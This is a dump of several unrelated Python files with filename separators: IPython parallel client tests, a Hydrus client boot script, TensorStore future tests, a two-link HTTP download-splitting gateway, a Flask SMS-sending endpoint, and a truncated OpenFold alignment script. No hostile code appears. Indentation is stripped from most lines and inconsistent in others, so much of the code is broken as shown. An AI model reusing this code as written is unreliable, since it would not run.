v = self.client.load_balanced_view()
ar = v.apply_async(lambda x: x, 'x'*1024)
ar.get()
self._wait_for_idle()
ars = [ar]
        for i in range(10):
            ar = ars[-1]
            ar2 = self.client.resubmit(ar.msg_ids)
            ars.append(ar2)
        [ ar.get() for ar in ars ]
def test_resubmit_header(self):
"""resubmit shouldn't clobber the whole header"""
def f():
import random
return random.random()
v = self.client.load_balanced_view()
v.retries = 1
ar = v.apply_async(f)
r1 = ar.get(1)
# give the Hub a chance to notice:
self._wait_for_idle()
ahr = self.client.resubmit(ar.msg_ids)
ahr.get(1)
time.sleep(0.5)
records = self.client.db_query({'msg_id': {'$in': ar.msg_ids + ahr.msg_ids}}, keys='header')
h1,h2 = [ r['header'] for r in records ]
for key in set(h1.keys()).union(set(h2.keys())):
if key in ('msg_id', 'date'):
self.assertNotEqual(h1[key], h2[key])
else:
self.assertEqual(h1[key], h2[key])
def test_resubmit_aborted(self):
def f():
import random
return random.random()
v = self.client.load_balanced_view()
# restrict to one engine, so we can put a sleep
# ahead of the task, so it will get aborted
eid = self.client.ids[-1]
v.targets = [eid]
sleep = v.apply_async(time.sleep, 0.5)
ar = v.apply_async(f)
ar.abort()
self.assertRaises(error.TaskAborted, ar.get)
# Give the Hub a chance to get up to date:
self._wait_for_idle()
ahr = self.client.resubmit(ar.msg_ids)
r2 = ahr.get(1)
def test_resubmit_inflight(self):
"""resubmit of inflight task"""
v = self.client.load_balanced_view()
ar = v.apply_async(time.sleep,1)
# give the message a chance to arrive
time.sleep(0.2)
ahr = self.client.resubmit(ar.msg_ids)
ar.get(2)
ahr.get(2)
    def test_resubmit_badkey(self):
        """ensure KeyError on resubmit of nonexistent task"""
self.assertRaisesRemote(KeyError, self.client.resubmit, ['invalid'])
def test_purge_hub_results(self):
# ensure there are some tasks
for i in range(5):
self.client[:].apply_sync(lambda : 1)
# Wait for the Hub to realise the result is done:
# This prevents a race condition, where we
# might purge a result the Hub still thinks is pending.
self._wait_for_idle()
rc2 = clientmod.Client(profile='iptest')
hist = self.client.hub_history()
ahr = rc2.get_result([hist[-1]])
ahr.wait(10)
self.client.purge_hub_results(hist[-1])
newhist = self.client.hub_history()
self.assertEqual(len(newhist)+1,len(hist))
rc2.close()
def test_purge_local_results(self):
# ensure there are some tasks
# purge local results is mostly unnecessary now that we have Futures
msg_id = 'asdf'
self.client.results[msg_id] = 5
md = self.client.metadata[msg_id]
before = len(self.client.results)
self.assertEqual(len(self.client.metadata), before)
self.client.purge_local_results(msg_id)
self.assertLessEqual(len(self.client.results), before-1, msg="Not removed from results")
self.assertLessEqual(len(self.client.metadata), before-1, msg="Not removed from metadata")
def test_purge_local_results_outstanding(self):
v = self.client[-1]
ar = v.apply_async(time.sleep, 1)
with self.assertRaises(RuntimeError):
self.client.purge_local_results(ar)
ar.get()
self.client.purge_local_results(ar)
def test_purge_all_local_results_outstanding(self):
v = self.client[-1]
ar = v.apply_async(time.sleep, 1)
with self.assertRaises(RuntimeError):
self.client.purge_local_results('all')
ar.get()
self.client.purge_local_results('all')
def test_purge_all_hub_results(self):
self.client.purge_hub_results('all')
hist = self.client.hub_history()
self.assertEqual(len(hist), 0)
def test_purge_all_local_results(self):
self.client.purge_local_results('all')
self.assertEqual(len(self.client.results), 0, msg="Results not empty")
self.assertEqual(len(self.client.metadata), 0, msg="metadata not empty")
def test_purge_all_results(self):
# ensure there are some tasks
for i in range(5):
self.client[:].apply_sync(lambda : 1)
self.client.wait(10)
self._wait_for_idle()
self.client.purge_results('all')
self.assertEqual(len(self.client.results), 0, msg="Results not empty")
self.assertEqual(len(self.client.metadata), 0, msg="metadata not empty")
hist = self.client.hub_history()
self.assertEqual(len(hist), 0, msg="hub history not empty")
def test_purge_everything(self):
# ensure there are some tasks
for i in range(5):
self.client[:].apply_sync(lambda : 1)
self.client.wait(10)
self._wait_for_idle()
self.client.purge_everything()
# The client results
self.assertEqual(len(self.client.results), 0, msg="Results not empty")
self.assertEqual(len(self.client.metadata), 0, msg="metadata not empty")
# The client "bookkeeping"
self.assertEqual(len(self.client.session.digest_history), 0, msg="session digest not empty")
self.assertEqual(len(self.client.history), 0, msg="client history not empty")
# the hub results
hist = self.client.hub_history()
self.assertEqual(len(hist), 0, msg="hub history not empty")
def test_activate(self):
ip = get_ipython()
magics = ip.magics_manager.magics
self.assertTrue('px' in magics['line'])
self.assertTrue('px' in magics['cell'])
v0 = self.client.activate(-1, '0')
self.assertTrue('px0' in magics['line'])
self.assertTrue('px0' in magics['cell'])
self.assertEqual(v0.targets, self.client.ids[-1])
v0 = self.client.activate('all', 'all')
self.assertTrue('pxall' in magics['line'])
self.assertTrue('pxall' in magics['cell'])
self.assertEqual(v0.targets, 'all')
def test_wait_interactive(self):
ar = self.client[-1].apply_async(lambda : 1)
self.client.wait_interactive()
self.assertEqual(self.client.outstanding, set())
def test_await_future(self):
f = Future()
tf = TornadoFuture()
def finish_later():
time.sleep(0.1)
f.set_result('future')
tf.set_result('tornado')
Thread(target=finish_later).start()
assert self.client.wait([f, tf])
assert f.done()
assert tf.done()
assert f.result() == 'future'
assert tf.result() == 'tornado'
@skip_without('distributed')
def test_become_dask(self):
executor = self.client.become_dask()
reprs = self.client[:].apply_sync(repr, Reference('distributed_worker'))
for r in reprs:
self.assertIn("Worker", r)
squares = executor.map(lambda x: x * x, range(10))
tot = executor.submit(sum, squares)
self.assertEqual(tot.result(), 285)
# cleanup
self.client.stop_distributed()
ar = self.client[:].apply_async(lambda x: x, Reference('distributed_worker'))
self.assertRaisesRemote(NameError, ar.get)
|
hydrus_client.py
|
#!/usr/bin/env python3
# Hydrus is released under WTFPL
# You just DO WHAT THE FUCK YOU WANT TO.
# https://github.com/sirkris/WTFPL/blob/master/WTFPL.md
import locale
try: locale.setlocale( locale.LC_ALL, '' )
except: pass
try:
import os
import argparse
import sys
from hydrus.core import HydrusBoot
HydrusBoot.AddBaseDirToEnvPath()
# initialise Qt here, important it is done early
from hydrus.client.gui import QtPorting as QP
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusData
from hydrus.core import HydrusGlobals as HG
from hydrus.core import HydrusLogger
from hydrus.core import HydrusPaths
from hydrus.core import HydrusTemp
argparser = argparse.ArgumentParser( description = 'hydrus network client' )
argparser.add_argument( '-d', '--db_dir', help = 'set an external db location' )
argparser.add_argument( '--temp_dir', help = 'override the program\'s temporary directory' )
argparser.add_argument( '--db_journal_mode', default = 'WAL', choices = [ 'WAL', 'TRUNCATE', 'PERSIST', 'MEMORY' ], help = 'change db journal mode (default=WAL)' )
argparser.add_argument( '--db_cache_size', type = int, help = 'override SQLite cache_size per db file, in MB (default=256)' )
argparser.add_argument( '--db_transaction_commit_period', type = int, help = 'override how often (in seconds) database changes are saved to disk (default=30,min=10)' )
argparser.add_argument( '--db_synchronous_override', type = int, choices = range(4), help = 'override SQLite Synchronous PRAGMA (default=2)' )
argparser.add_argument( '--no_db_temp_files', action='store_true', help = 'run db temp operations entirely in memory' )
argparser.add_argument( '--boot_debug', action='store_true', help = 'print additional bootup information to the log' )
argparser.add_argument( '--no_wal', action='store_true', help = 'OBSOLETE: run using TRUNCATE db journaling' )
argparser.add_argument( '--db_memory_journaling', action='store_true', help = 'OBSOLETE: run using MEMORY db journaling (DANGEROUS)' )
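    # Example invocation (hypothetical path):
    #   python hydrus_client.py -d /my/db --db_journal_mode WAL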
result = argparser.parse_args()
if result.db_dir is None:
db_dir = HC.DEFAULT_DB_DIR
if not HydrusPaths.DirectoryIsWriteable( db_dir ) or HC.RUNNING_FROM_MACOS_APP:
if HC.USERPATH_DB_DIR is None:
raise Exception( 'The default db path "{}" was not writeable, and the userpath could not be determined!'.format( HC.DEFAULT_DB_DIR ) )
db_dir = HC.USERPATH_DB_DIR
else:
db_dir = result.db_dir
db_dir = HydrusPaths.ConvertPortablePathToAbsPath( db_dir, HC.BASE_DIR )
if not HydrusPaths.DirectoryIsWriteable( db_dir ):
        raise Exception( 'The given db path "{}" is not writeable!'.format( db_dir ) )
try:
HydrusPaths.MakeSureDirectoryExists( db_dir )
except:
raise Exception( 'Could not ensure db path "{}" exists! Check the location is correct and that you have permission to write to it!'.format( db_dir ) )
if not os.path.isdir( db_dir ):
raise Exception( 'The given db path "{}" is not a directory!'.format( db_dir ) )
HG.db_journal_mode = result.db_journal_mode
if result.no_wal:
HG.db_journal_mode = 'TRUNCATE'
if result.db_memory_journaling:
HG.db_journal_mode = 'MEMORY'
if result.db_cache_size is not None:
HG.db_cache_size = result.db_cache_size
else:
HG.db_cache_size = 256
if result.db_transaction_commit_period is not None:
HG.db_transaction_commit_period = max( 10, result.db_transaction_commit_period )
else:
HG.db_transaction_commit_period = 30
if result.db_synchronous_override is not None:
HG.db_synchronous = int( result.db_synchronous_override )
else:
if HG.db_journal_mode == 'WAL':
HG.db_synchronous = 1
else:
HG.db_synchronous = 2
HG.no_db_temp_files = result.no_db_temp_files
HG.boot_debug = result.boot_debug
try:
from twisted.internet import reactor
except:
HG.twisted_is_broke = True
except Exception as e:
try:
HydrusData.DebugPrint( 'Critical boot error occurred! Details written to crash.log!' )
HydrusData.PrintException( e )
except:
pass
import traceback
error_trace = traceback.format_exc()
print( error_trace )
if 'db_dir' in locals() and os.path.exists( db_dir ):
emergency_dir = db_dir
else:
emergency_dir = os.path.expanduser( '~' )
possible_desktop = os.path.join( emergency_dir, 'Desktop' )
if os.path.exists( possible_desktop ) and os.path.isdir( possible_desktop ):
emergency_dir = possible_desktop
dest_path = os.path.join( emergency_dir, 'hydrus_crash.log' )
with open( dest_path, 'w', encoding = 'utf-8' ) as f:
f.write( error_trace )
print( 'Critical boot error occurred! Details written to hydrus_crash.log in either db dir or user dir!' )
sys.exit( 1 )
def boot():
if result.temp_dir is not None:
HydrusTemp.SetEnvTempDir( result.temp_dir )
controller = None
with HydrusLogger.HydrusLogger( db_dir, 'client' ) as logger:
try:
HydrusData.Print( 'hydrus client started' )
if not HG.twisted_is_broke:
import threading
threading.Thread( target = reactor.run, name = 'twisted', kwargs = { 'installSignalHandlers' : 0 } ).start()
from hydrus.client import ClientController
controller = ClientController.Controller( db_dir )
controller.Run()
except:
HydrusData.Print( 'hydrus client failed' )
import traceback
HydrusData.Print( traceback.format_exc() )
finally:
HG.started_shutdown = True
HG.view_shutdown = True
HG.model_shutdown = True
if controller is not None:
controller.pubimmediate( 'wake_daemons' )
if not HG.twisted_is_broke:
reactor.callFromThread( reactor.stop )
HydrusData.Print( 'hydrus client shut down' )
HG.shutdown_complete = True
if HG.restart:
HydrusData.RestartProcess()
|
future_test.py
|
# Copyright 2020 The TensorStore Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import os
import pickle
import time
import signal
import threading
import pytest
import tensorstore as ts
pytestmark = pytest.mark.asyncio
def test_promise_new():
promise, future = ts.Promise.new()
assert future.done() == False
promise.set_result(5)
assert future.done()
assert future.result() == 5
def test_promise_result_release_gil():
promise, future = ts.Promise.new()
t = threading.Thread(target=future.result)
t.start()
time.sleep(0.1)
promise.set_result(5)
t.join()
def test_promise_set_exception():
promise, future = ts.Promise.new()
assert future.done() == False
promise.set_exception(ValueError('abc'))
with pytest.raises(ValueError, match='abc'):
future.result()
assert isinstance(future.exception(), ValueError)
@pytest.mark.skipif(
os.name == 'nt',
reason='CTRL_C_EVENT is delayed on Windows until keyboard input is received'
)
@pytest.mark.skipif(
'signal.getsignal(signal.SIGINT) != signal.default_int_handler',
reason='SIGINT handler not installed')
def test_promise_wait_interrupt():
promise, future = ts.Promise.new()
def do_interrupt():
time.sleep(0.01)
sig = signal.CTRL_C_EVENT if os.name == 'nt' else signal.SIGINT # type: ignore
os.kill(os.getpid(), sig)
with pytest.raises(KeyboardInterrupt):
threading.Thread(target=do_interrupt).start()
future.result(timeout=5)
def test_promise_cancel():
promise, future = ts.Promise.new()
assert future.done() == False
def do_cancel():
time.sleep(0.1)
future.cancel()
t = threading.Thread(target=do_cancel)
t.start()
with pytest.raises(asyncio.CancelledError):
future.result(timeout=5)
t.join()
def test_promise_timeout():
promise, future = ts.Promise.new()
assert future.done() == False
with pytest.raises(TimeoutError):
future.result(timeout=0.1)
with pytest.raises(TimeoutError):
future.result(deadline=time.time() + 0.1)
promise.set_result(5)
assert future.result(timeout=0) == 5
async def test_coroutine():
async def do_async():
return 42
assert await ts.Future(do_async()) == 42
async def test_coroutine_explicit_loop():
data = threading.local()
loop_promise, loop_future = ts.Promise.new()
def thread_proc():
nonlocal loop
data.thread = 'new'
loop = asyncio.new_event_loop()
loop_promise.set_result(loop)
loop.run_forever()
t = threading.Thread(target=thread_proc)
t.start()
loop = await loop_future
async def do_async():
return data.thread
data.thread = 'main'
assert await ts.Future(do_async()) == 'main'
assert await ts.Future(do_async(), loop=loop) == 'new'
loop.call_soon_threadsafe(loop.stop)
t.join()
@pytest.mark.filterwarnings(
'ignore:coroutine .* was never awaited:RuntimeWarning')
def test_coroutine_no_event_loop_specified():
async def do_async():
return 42
with pytest.raises(ValueError, match='no event loop specified'):
ts.Future(do_async())
def test_gc_result_cycle(gc_tester):
obj = []
f = ts.Future(obj)
obj.append(f)
gc_tester(f)
def test_gc_callback_cycle(gc_tester):
def callback(f):
del f
pass
promise, future = ts.Promise.new()
future.add_done_callback(callback)
callback.future = future
callback.promise = promise
gc_tester(future)
def test_promise_instantiation():
with pytest.raises(TypeError):
ts.Promise()
def test_write_futures_instantiation():
with pytest.raises(TypeError):
ts.WriteFutures()
def test_pickle_failure():
p, f = ts.Promise.new()
with pytest.raises(TypeError):
pickle.dumps(p)
with pytest.raises(TypeError):
pickle.dumps(f)
|
Gateway_v1.py
|
from http.server import ThreadingHTTPServer, SimpleHTTPRequestHandler
from requests_toolbelt.adapters.source import SourceAddressAdapter
from datetime import datetime, timezone
import config.config as cfg
import requests as req
import logging as log
from socket import *
import threading
import ssl
# init gateway info
GATEWAY_IP = cfg.primary['ip']
GATEWAY_PORT = cfg.primary['port']
# init test server info
TEST_SERVER_IP = cfg.server['ip']
TEST_SERVER_PORT = str(cfg.server['port'])
# init connection info
PRIMARY_IP = cfg.primary['ip']
PRIMARY_PORT = cfg.primary['port']
SECOND_IP = cfg.secondary['ip']
SECOND_PORT = cfg.secondary['port']
IS_SECOND_AVAILABLE = True
# init request info
REQUESTED_HOSTNAME = ''
REQUESTED_PATH = ''
REQUESTED_PORT = cfg.requested['httpPort']
HTTP_VERSION = cfg.requested['httpVersion']
IS_ACCEPT_RANGE = True
IS_VERIFY = False
CONTENT_LENGTH = 0
CONTENT_TYPE = ""
# init timestamps
CURRENT_TIME = datetime.now(timezone.utc).timestamp()
START_STAMP_PRIMARY = CURRENT_TIME
END_STAMP_PRIMARY = CURRENT_TIME
START_STAMP_SECOND = CURRENT_TIME
END_STAMP_SECOND = CURRENT_TIME
REQUEST_RECV_TIME = CURRENT_TIME
REQUEST_HANDLE_TIME = CURRENT_TIME
# init range boundaries
PRIMARY_RANGE_END = 0
SECOND_RANGE_START = 0
SECOND_LOAD = 0
# init get request responses to keep them as bytes
RESPONSE_PRIMARY = b""
RESPONSE_SECOND = b""
RESPONSE = b""
# init head request response
HEAD_RESPONSE_HEADERS = None
# init socket request headers
SOCKET_HEAD_HEADERS = ""
SOCKET_GET_HEADERS = ""
# constants to create headers
LINE = "\r\n"
HEADER = LINE + LINE
def handleRequest(self):
assignRequestInfo(self.path[1:])
createSocketHeadHeaders()
measureBandwidth()
assignContentInfo()
calculateLoadWeight()
log.info("++++ Head requests are done ++++")
createSocketGetHeaders()
sendRangeRequest()
pushBackToClient(self)
# Assign request info
# Requested string comes in the format of http://site/path or https://site/path
def assignRequestInfo(requested):
global HTTP_VERSION, REQUESTED_PORT, REQUESTED_HOSTNAME, REQUESTED_PATH, IS_VERIFY
HTTP_VERSION = requested.split(":")[0] + "://"
    if "s" in HTTP_VERSION:
IS_VERIFY = True
REQUESTED_PORT = cfg.requested['httpsPort']
REQUESTED_HOSTNAME = requested.split("//")[1].split("/")[0]
    if ":" in REQUESTED_HOSTNAME:
REQUESTED_HOSTNAME = REQUESTED_HOSTNAME.split(":")[0]
REQUESTED_PORT = 8080
REQUESTED_PATH = '/'
try:
REQUESTED_PATH += requested.split("//")[1].split("/", 1)[1]
except:
log.error("No path was found")
# Create headers to send HEAD request over socket using Secondary Connection
def createSocketHeadHeaders():
global SOCKET_HEAD_HEADERS
SOCKET_HEAD_HEADERS = "HEAD " + REQUESTED_PATH + " HTTP/1.1" + LINE
SOCKET_HEAD_HEADERS += "Host: " + REQUESTED_HOSTNAME + LINE
SOCKET_HEAD_HEADERS += "Accept: */*" + LINE
SOCKET_HEAD_HEADERS += "User-Agent: kibitzer" + LINE
SOCKET_HEAD_HEADERS += "Connection: Close" + HEADER
# Measure bandwidth using HEAD requests over two connections
def measureBandwidth():
defaultThread = threading.Thread(target=sendHeadPrimary)
mobileThread = threading.Thread(target=sendHeadSecondary)
defaultThread.start()
mobileThread.start()
defaultThread.join()
mobileThread.join()
# Send HEAD request over Primary Connection
def sendHeadPrimary():
log.info("*** Primary head is started")
global START_STAMP_PRIMARY, HEAD_RESPONSE_HEADERS, END_STAMP_PRIMARY
START_STAMP_PRIMARY = getCurrentTime()
    URL = buildRequestUrl()
HEAD_RESPONSE_HEADERS = req.head(URL, verify=IS_VERIFY)
END_STAMP_PRIMARY = getCurrentTime()
HEAD_RESPONSE_HEADERS = HEAD_RESPONSE_HEADERS.headers
log.info("*** Primary head is done")
def getCurrentTime():
return datetime.now(timezone.utc).timestamp()
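# Build the upstream URL shared by the HEAD and GET paths; the explicit
# ":8080" suffix mirrors the port pinned in assignRequestInfo().
def buildRequestUrl():
    if REQUESTED_PORT == 8080:
        return HTTP_VERSION + REQUESTED_HOSTNAME + ":8080" + REQUESTED_PATH
    return HTTP_VERSION + REQUESTED_HOSTNAME + REQUESTED_PATH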
# Send HEAD request over Secondary Connection
def sendHeadSecondary():
log.info("--- Secondary head is started")
global IS_SECOND_AVAILABLE
try:
con = socket(AF_INET, SOCK_STREAM)
con.bind((SECOND_IP, SECOND_PORT))
if IS_VERIFY:
sendHeadSecondaryHttps(con)
else:
sendHeadSecondaryHttp(con)
log.info("--- Secondary head is done")
    except Exception:
        log.info("--- Second connection was not found")
        IS_SECOND_AVAILABLE = False
# Send HEAD request to HTTPS sources
def sendHeadSecondaryHttps(con):
global START_STAMP_SECOND, END_STAMP_SECOND
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_default_certs()
ssl_socket = context.wrap_socket(con, server_hostname=REQUESTED_HOSTNAME)
ssl_socket.connect((REQUESTED_HOSTNAME, REQUESTED_PORT))
START_STAMP_SECOND = getCurrentTime()
ssl_socket.sendall(SOCKET_HEAD_HEADERS.encode("utf-8"))
ssl_socket.recv(10)
END_STAMP_SECOND = getCurrentTime()
ssl_socket.close()
con.close()
# Send HEAD request to HTTP sources
def sendHeadSecondaryHttp(con):
global START_STAMP_SECOND, END_STAMP_SECOND
con.connect((REQUESTED_HOSTNAME, REQUESTED_PORT))
START_STAMP_SECOND = getCurrentTime()
con.sendall(SOCKET_HEAD_HEADERS.encode('utf-8'))
con.recv(10)
END_STAMP_SECOND = getCurrentTime()
con.close()
# Check HEAD request responses and assign content info
def assignContentInfo():
global IS_ACCEPT_RANGE, CONTENT_LENGTH, CONTENT_TYPE
    try:
        if HEAD_RESPONSE_HEADERS["accept-ranges"].lower() == "none":
            IS_ACCEPT_RANGE = False
    except (KeyError, TypeError):
        log.error("Accept-Ranges header was not found")
        IS_ACCEPT_RANGE = False
    try:
        CONTENT_LENGTH = int(HEAD_RESPONSE_HEADERS["content-length"])
    except (KeyError, TypeError, ValueError):
        log.error("Content-Length header was not found")
    try:
        CONTENT_TYPE = HEAD_RESPONSE_HEADERS["content-type"]
    except (KeyError, TypeError):
        log.error("Content-Type header was not found")
# Calculate load weight over timestamps
def calculateLoadWeight():
global PRIMARY_RANGE_END, SECOND_RANGE_START, SECOND_LOAD
primaryStamp = END_STAMP_PRIMARY - START_STAMP_PRIMARY
secondaryStamp = END_STAMP_SECOND - START_STAMP_SECOND
log.info("*** Primary stamp: %s", str(round(primaryStamp, 2)))
log.info("--- Secondary stamp: %s", str(round(secondaryStamp, 2)))
if secondaryStamp != 0:
defaultLoadRate = round((secondaryStamp / (primaryStamp + secondaryStamp)), 2)
else:
defaultLoadRate = 1
PRIMARY_RANGE_END = round(defaultLoadRate * CONTENT_LENGTH)
log.info("Content-Length: %s", str(CONTENT_LENGTH))
log.info("*** Primary load length: %s bytes / %s MB", str(PRIMARY_RANGE_END),
str(round(convertToMb(PRIMARY_RANGE_END), 2)))
log.info("--- Secondary load length: %s bytes / %s MB", str(CONTENT_LENGTH - PRIMARY_RANGE_END - 1),
str(round(convertToMb(CONTENT_LENGTH - PRIMARY_RANGE_END - 1), 2)))
SECOND_RANGE_START = PRIMARY_RANGE_END + 1
SECOND_LOAD = CONTENT_LENGTH - SECOND_RANGE_START
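# Worked example: if the primary HEAD round trip took 0.2 s and the secondary
# took 0.6 s, defaultLoadRate = 0.6 / (0.2 + 0.6) = 0.75, so the faster
# primary link downloads 75% of the bytes and the secondary the remaining 25%.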
def convertToMb(num):
return num / (1024 * 1024)
# Create headers to send GET request over socket using Secondary Connection
def createSocketGetHeaders():
global SOCKET_GET_HEADERS
SOCKET_GET_HEADERS = "GET " + REQUESTED_PATH + " HTTP/1.1" + LINE
SOCKET_GET_HEADERS += "Host: " + REQUESTED_HOSTNAME + LINE
SOCKET_GET_HEADERS += "Accept: */*" + LINE
SOCKET_GET_HEADERS += "User-Agent: kibitzer" + LINE
SOCKET_GET_HEADERS += "Range: bytes=" + str(SECOND_RANGE_START) + "-" + str(CONTENT_LENGTH - 1) + LINE
SOCKET_GET_HEADERS += "Connection: Close" + HEADER
# Send GET requests over the two connections as range requests
def sendRangeRequest():
global RESPONSE
defaultThread = threading.Thread(target=sendGetPrimary)
if IS_SECOND_AVAILABLE and IS_ACCEPT_RANGE:
mobileThread = threading.Thread(target=sendGetSecondary)
mobileThread.start()
defaultThread.start()
defaultThread.join()
if IS_SECOND_AVAILABLE and IS_ACCEPT_RANGE:
mobileThread.join()
RESPONSE = RESPONSE_PRIMARY + RESPONSE_SECOND
# Send GET request over Primary Connection
def sendGetPrimary():
log.info("*** Primary GET is started")
global RESPONSE_PRIMARY
headers = {
"Host": REQUESTED_HOSTNAME, "Accept": "*/*",
"User-Agent": "kibitzer", 'Connection': 'Close'
}
if IS_ACCEPT_RANGE:
rangeValue = 'bytes=0-' + str(PRIMARY_RANGE_END)
headers.update({'Range': rangeValue})
    URL = buildRequestUrl()
RESPONSE_PRIMARY = req.get(URL,
headers=headers, verify=True).content
log.info("*** Primary GET is done")
# Send GET request over Secondary Connection
def sendGetSecondary():
log.info("--- Secondary GET is started")
global RESPONSE_SECOND
headers = {
"Host": REQUESTED_HOSTNAME, "Accept": "*/*",
"User-Agent": "kibitzer", 'Connection': 'Close'
}
if IS_ACCEPT_RANGE:
rangeValue = "bytes=" + str(SECOND_RANGE_START) + "-" + str(CONTENT_LENGTH - 1)
headers.update({'Range': rangeValue})
    URL = buildRequestUrl()
s = req.Session()
s.mount('http://', SourceAddressAdapter(SECOND_IP))
RESPONSE_SECOND = s.get(URL, headers=headers, verify=True).content
# con = socket(AF_INET, SOCK_STREAM)
# con.bind((SECOND_IP, SECOND_PORT + 1))
# if IS_VERIFY:
# sendGetHttps(con)
# else:
# sendGetHttp(con)
# try:
# con.close()
# except Exception as e:
# print(str(e))
log.info("--- Secondary GET is done")
# Send GET request to HTTPS
def sendGetHttps(con):
global RESPONSE_SECOND
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_default_certs()
ssl_socket = context.wrap_socket(con, server_hostname=REQUESTED_HOSTNAME)
ssl_socket.connect((REQUESTED_HOSTNAME, REQUESTED_PORT))
ssl_socket.sendall(SOCKET_GET_HEADERS.encode("utf-8"))
count = 0
while True:
if count >= SECOND_LOAD:
print("------ break equal------------")
break
data = ssl_socket.recv(10000)
if not data:
print("------ break no data------------")
break
count += len(data)
RESPONSE_SECOND += data
RESPONSE_SECOND = RESPONSE_SECOND.split(HEADER.encode("utf-8"), 1)[1]
ssl_socket.close()
con.close()
# Send GET request to HTTP
def sendGetHttp(con):
global RESPONSE_SECOND
con.connect((REQUESTED_HOSTNAME, REQUESTED_PORT))
con.sendall(SOCKET_GET_HEADERS.encode("utf-8"))
count = 0
while True:
if count >= SECOND_LOAD:
print("------ break equal------------")
break
data = con.recv(10000)
if not data:
print("------ break no data------------")
break
count += len(data)
RESPONSE_SECOND += data
RESPONSE_SECOND = RESPONSE_SECOND.split(HEADER.encode("utf-8"), 1)[1]
con.close()
# Push back GET request responses to client
def pushBackToClient(self):
global REQUEST_HANDLE_TIME
self.send_response(200)
self.send_header('Content-Type', CONTENT_TYPE)
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-Length', str(CONTENT_LENGTH))
self.end_headers()
self.wfile.write(RESPONSE)
log.info("Response is pushed back to client")
REQUEST_HANDLE_TIME = getCurrentTime()
log.info("Total time passed: %s seconds", str(round(REQUEST_HANDLE_TIME - REQUEST_RECV_TIME, 2)))
class Proxy(SimpleHTTPRequestHandler):
def do_GET(self):
global REQUEST_RECV_TIME
if self.path.startswith("/http"):
log.info("Gateway got a new request")
REQUEST_RECV_TIME = getCurrentTime()
handleRequest(self)
log.info("---------------------------------------------------------------------\n")
else:
log.error("Undefined format")
log.basicConfig(filename='D:\\PyCharm Projects\\Senior\\src\\log_records\\gateway_v1.log', level=log.DEBUG, format='%(asctime)s - %(message)s')
connection = ThreadingHTTPServer((GATEWAY_IP, GATEWAY_PORT), Proxy)
connection.serve_forever()
|
app.py
|
import functools
import threading
from flask import (
Flask,
request
)
import telia
app = Flask(__name__)
app.config.from_object("config")
def check_auth(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if request.is_json:
data = request.get_json()
if "auth" in data:
if data["auth"] == app.config["AUTH_KEY"]:
return func(*args, **kwargs)
else:
return "Unauthorized", 401
return "Bad request", 400
return wrapper
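# Example request body (AUTH_KEY comes from config.py; the contact format is
# whatever telia.TeliaAPI.send_sms expects):
#   {"auth": "<AUTH_KEY>", "message": "Hello", "contact": "<recipient>"}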
def send_sms(message, contact):
api = telia.TeliaAPI(app.config["TELIA_USERNAME"], app.config["TELIA_PASSWORD"])
api.send_sms(message, [contact])
api.session.close()
@app.route("/", methods=["POST"])
@check_auth
def index():
    if request.is_json:
        data = request.get_json()
        if "message" not in data or "contact" not in data:
            return "Bad request", 400
        threading.Thread(target=send_sms, args=(data["message"], data["contact"])).start()
        return "OK"
    else:
        return "Bad request", 400
if __name__ == "__main__":
app.run()
|
precompute_alignments.py
|
import argparse
from functools import partial
import json
import logging
import os
import threading
from multiprocessing import cpu_count
from shutil import copyfile
import tempfile
import openfold.data.mmcif_parsing as mmcif_parsing
from openfold.data.data_pipeline import AlignmentRunner
from openfold.data.parsers import parse_fasta
from openfold.np import protein, residue_constants
from utils import add_data_args
logging.basicConfig(level=logging.WARNING)
def run_seq_group_alignments(seq_groups, alignment_runner, args):
dirs = set(os.listdir(args.output_dir))
for seq, names in seq_groups:
first_name = names[0]
alignment_dir = os.path.join(args.output_dir, first_name)
try:
os.makedirs(alignment_dir)
except Exception as e:
logging.warning(f"Failed to create directory for {first_name} with exception {e}...")
continue
fd, fasta_path = tempfile.mkstemp(suffix=".fasta")
with os.fdopen(fd, 'w') as fp:
fp.write(f'>query\n{seq}')
try:
alignment_runner.run(
fasta_path, alignment_dir
)
        except Exception:
            logging.warning(f"Failed to run alignments for {first_name}. Skipping...")
os.remove(fasta_path)
os.rmdir(alignment_dir)
continue
os.remove(fasta_path)
for name in names[1:]:
if(name in dirs):
logging.warning(
f'{name} has already been processed. Skipping...'
)
continue
cp_dir = os.path.join(args.output_dir, name)
os.makedirs(cp_dir, exist_ok=True)
for f in os.listdir(alignment_dir):
copyfile(os.path.join(alignment_dir, f), os.path.join(cp_dir, f))
def parse_and_align(files, alignment_runner, args):
for f in files:
path = os.path.join(args.input_dir, f)
file_id = os.path.splitext(f)[0]
seq_group_dict = {}
if(f.endswith('.cif')):
with open(path, 'r') as fp:
mmcif_str = fp.read()
mmcif = mmcif_parsing.parse(
file_id=file_id, mmcif_string=mmcif_str
)
if(mmcif.mmcif_object is None):
logging.warning(f'Failed to parse {f}...')
if(args.raise_errors):
raise list(mmcif.errors.values())[0]
else:
continue
mmcif = mmcif.mmcif_object
for chain_letter, seq in mmcif.chain_to_seqres.items():
chain_id = '_'.join([file_id, chain_letter])
l = seq_group_dict.setdefault(seq, [])
l.append(chain_id)
elif(f.endswith('.fasta') or f.endswith('.fa')):
with open(path, 'r') as fp:
fasta_str = fp.read()
input_seqs, _ = parse_fasta(fasta_str)
if len(input_seqs) != 1:
msg = f'More than one input_sequence found in {f}'
if(args.raise_errors):
raise ValueError(msg)
else:
logging.warning(msg)
input_sequence = input_seqs[0]
seq_group_dict[input_sequence] = [file_id]
elif(f.endswith('.core')):
with open(path, 'r') as fp:
core_str = fp.read()
core_prot = protein.from_proteinnet_string(core_str)
aatype = core_prot.aatype
seq = ''.join([
residue_constants.restypes_with_x[aatype[i]]
for i in range(len(aatype))
])
seq_group_dict[seq] = [file_id]
else:
